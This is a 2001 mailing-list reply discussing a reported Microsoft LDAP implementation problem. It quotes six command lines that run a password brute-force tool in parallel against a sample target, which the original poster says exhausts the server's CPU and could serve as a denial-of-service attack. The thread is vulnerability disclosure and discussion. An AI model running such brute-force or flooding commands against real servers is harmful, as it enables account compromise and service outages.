Vulnerability Development mailing list archives

Re: implementation problem in Microsoft LDAP?

From: "M.Grootveld" <M.Grootveld () ITsec nl>
Date: Mon, 02 Jul 2001 12:38:18 +0200

Hi

SardaƱons, Eliel wrote:

<snip>

Problem 2:

Another problem I have seen is that when I use my brute force program
(brute_force_ldap) to try to guess a Windows password and I run 5 or more
instance of my program at the same time like this:

./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_1 -l 8 &
./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_2 -l 8 &
./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_3 -l 8 &
./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_4 -l 8 &
./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_5 -l 8 &
./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_6 -l 8 &

the CPU usage in www.victim.com is at 100%!!! And the console is unusable in
the windows box. I try this using a none_existent_user and an existent_user
and it consumes more resources with non existent users.

So an attacker can use my program as a Distributed Denial Of service Attack
(ddos) running it from different machines at the same time with a unique
target. (www.victim.com).

Could you provide any additional details about your exploit code and the
configuration you are using. With the information you provided I can't tell if
the second problem is caused by an implementation problem or that the LDAP
service is perhaps configured incorrectly.

Greetings

M. Grootveld